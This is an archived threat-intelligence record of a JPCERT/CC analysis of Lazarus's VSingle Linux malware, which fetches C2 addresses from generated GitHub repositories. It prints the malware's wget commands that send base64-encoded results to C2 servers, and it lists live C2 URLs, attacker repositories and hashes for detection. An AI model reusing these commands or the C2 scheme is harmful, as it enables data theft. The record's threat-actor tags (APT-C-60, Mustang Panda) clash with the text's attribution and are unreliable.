{
	"id": "d0cdc457-55a2-4064-b998-30dcc4735da4",
	"created_at": "2026-04-06T00:09:59.549862Z",
	"updated_at": "2026-04-10T03:30:11.936547Z",
	"deleted_at": null,
	"sha1_hash": "d25a60177ac4d1696f5c91f5f88bc7bd6a46bca2",
	"title": "VSingle malware that obtains C2 server information from GitHub - JPCERT/CC Eyes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 754604,
	"plain_text": "VSingle malware that obtains C2 server information from GitHub\r\n- JPCERT/CC Eyes\r\nBy 朝長 秀誠 (Shusei Tomonaga)\r\nPublished: 2022-07-04 · Archived: 2026-04-05 22:48:51 UTC\r\nJuly 5, 2022\r\nLazarus\r\nSome types of malware use DGA, obfuscate destination information, or contain fake C2 server information in order to hide the real C2 server. Others obtain C2 server information from legitimate servers. Recently, VSingle, the malware used by Lazarus, has been updated to retrieve C2 server information from GitHub. This article focuses on the updates to VSingle. VSingle has two versions, one targeting Windows OS and the other targeting Linux OS, and this article is based on the latter, which has more updates.\r\nOverview of VSingle\r\nVSingle has three hard-coded C2 servers. However, when it cannot obtain data from them, the malware accesses GitHub to obtain new C2 servers. Figure 1 shows the operation flow of VSingle.\r\nhttps://blogs.jpcert.or.jp/en/2022/07/vsingle.html\r\nPage 1 of 7\n\nFigure 1: Operation flow of VSingle\r\nThe first communication sends the following data. uid contains a hashed value of the hostname, kernel release number, and an octet of the IP address combined. upw contains a Base64-encoded string of \"[IP address]|30.0|12b\".\r\nhttps://mantis.westlinks.net/api/soap/mc_enum.php?uid=[random digit string]\u0026upw=[Base64 string]\r\nThe data sent by the C2 server in response to the above request is stored at the following path. The data after \u003ccontents\u003e in this data is the AES key, IV data and command (Base64-encoded and RC4-encrypted).\r\n/tmp/.sess_%08x\r\nIn the following sections, I would like to explain the access patterns to GitHub and the communication method.\r\nAccess Patterns to GitHub\r\nThe GitHub repository from which the C2 server information is obtained is not fixed but dynamically generated. The following is the pattern of URLs to be accessed.\r\nhttps://raw.githubusercontent.com/%s/%s/master/README.de\r\nThe user name and repository name are each a string randomly selected from the following list, with a random string appended.\r\nTable 1: Strings used for usernames and repository names\r\nUsername: gar3ia, wo0d, tr3e, lucky, l0ve, v0siej, e0vvsje, polaris, grav1ty, w1inter, summer, ggo0dlluck\r\nRepository name: Arcan3, Wr0te, after, luxuryboy, pnpgather, happyv1m, laz3rpik, d0ta, Dronek, Panda3, cpsponso\r\nThe GitHub repository used by the attacker includes a URL in the \u003cvideolink1\u003e tag, as shown in Figure 2. The malware obtains this URL from the GitHub repository and connects to it. See Appendix A for the GitHub repositories that JPCERT/CC confirmed the attacker had used.\r\nFigure 2: Example GitHub repository used by attackers\r\nCommunication Method\r\nThe current version of VSingle uses the wget command to communicate with the C2 server, while previous versions used system calls. Figure 3 shows a part of the code that executes the wget command. (VSingle on Windows OS does not include this update and uses the Windows API, not the wget command.)\r\nFigure 3: A part of the code to execute the wget command\r\nWhile most types of malware use system calls and/or APIs to communicate with C2 servers, VSingle nevertheless executes the wget command, which easily leaves traces. In addition, the communication results are always saved in a file. During actual communication, the following commands are executed.\r\nsh -c \"wget -t 1 --server-response --no-check-certificate --user-agent=\\\"Mozilla/5.0 (X11; Linux x86_\r\nAs for the command execution results, the contents of the file (/tmp/.sess_%04x) in which the execution results are saved are Base64-encoded and sent via HTTP POST, as shown below.\r\nsh -c \"wget -t 1 --server-response --no-check-certificate --post-data=\\\"uid=15022694\u0026fipng=`base64 /t\r\nIn closing\r\nAttackers often tamper with legitimate web servers or use legitimate cloud services to conceal communication with C2 servers. Since it is difficult to detect such malware from logs, it is recommended to take countermeasures such as limiting the accessible destinations of servers that have a limited purpose. See the Appendix for the destinations of the malware discussed in this article.\r\nShusei Tomonaga\r\n(Translated by Takumi Nakano)\r\nAppendix A: GitHub repositories used by the attacker\r\nhttps://github.com/bgrav1ty13j/bPanda3\r\nhttps://github.com/fwo0d17n/fWr0te\r\nhttps://github.com/glucky18p/gluxuryboy\r\nhttps://github.com/gf00t18p/gpick/\r\nhttps://github.com/jv0siej21g/jlaz3rpik\r\nAppendix B: C2 servers\r\nhttps://mantis.westlinks.net/api/soap/mc_enum.php\r\nhttps://www.shipshorejob.com/ckeditor/samples/samples.php\r\nhttp://crm.vncgroup.com/cats/scripts/sphinxview.php\r\nhttps://ougreen.com/zone\r\nhttps://tecnojournals.com/general\r\nhttps://semiconductboard.com/xcror\r\nhttps://bluedragon.com/login\r\nhttps://tecnojournals.com/prest\r\nAppendix C: Malware hash values\r\n199ba618efc6af9280c5abd86c09cdf2d475c09c8c7ffc393a35c3d70277aed1\r\n2eb16dbc1097a590f07787ab285a013f5fe235287cb4fb948d4f9cce9efa5dbc\r\n414ed95d14964477bebf86dced0306714c497cde14dede67b0c1425ce451d3d7\r\n朝長 秀誠 (Shusei Tomonaga)\r\nSince December 2012, he has been engaged in malware analysis and forensic investigation, and is especially involved in analyzing incidents of targeted attacks. Prior to joining JPCERT/CC, he was engaged in security monitoring and analysis operations at a foreign-affiliated IT vendor. He has presented at CODE BLUE, BSidesLV, Black Hat USA Arsenal, Botconf, PacSec and the FIRST Conference. JSAC organizer.\r\nSource: https://blogs.jpcert.or.jp/en/2022/07/vsingle.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blogs.jpcert.or.jp/en/2022/07/vsingle.html"
	],
	"report_names": [
		"vsingle.html"
	],
	"threat_actors": [
		{
			"id": "15b8d5d8-32cf-408b-91b1-5d6ac1de9805",
			"created_at": "2023-07-20T02:00:08.724751Z",
			"updated_at": "2026-04-10T02:00:03.341845Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "MISPGALAXY:APT-C-60",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b69037ec-2605-4de4-bb32-a20d780a8406",
			"created_at": "2023-01-06T13:46:38.790766Z",
			"updated_at": "2026-04-10T02:00:03.101635Z",
			"deleted_at": null,
			"main_name": "MUSTANG PANDA",
			"aliases": [
				"Stately Taurus",
				"LuminousMoth",
				"TANTALUM",
				"Twill Typhoon",
				"TEMP.HEX",
				"Earth Preta",
				"Polaris",
				"BRONZE PRESIDENT",
				"HoneyMyte",
				"Red Lich",
				"TA416"
			],
			"source_name": "MISPGALAXY:MUSTANG PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ab47428c-7a8e-4ee8-9c8e-4e55c94d2854",
			"created_at": "2024-12-28T02:01:54.668462Z",
			"updated_at": "2026-04-10T02:00:04.564201Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "ETDA:APT-C-60",
			"tools": [
				"SpyGlace"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434199,
	"ts_updated_at": 1775791811,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d25a60177ac4d1696f5c91f5f88bc7bd6a46bca2.pdf",
		"text": "https://archive.orkl.eu/d25a60177ac4d1696f5c91f5f88bc7bd6a46bca2.txt",
		"img": "https://archive.orkl.eu/d25a60177ac4d1696f5c91f5f88bc7bd6a46bca2.jpg"
	}
}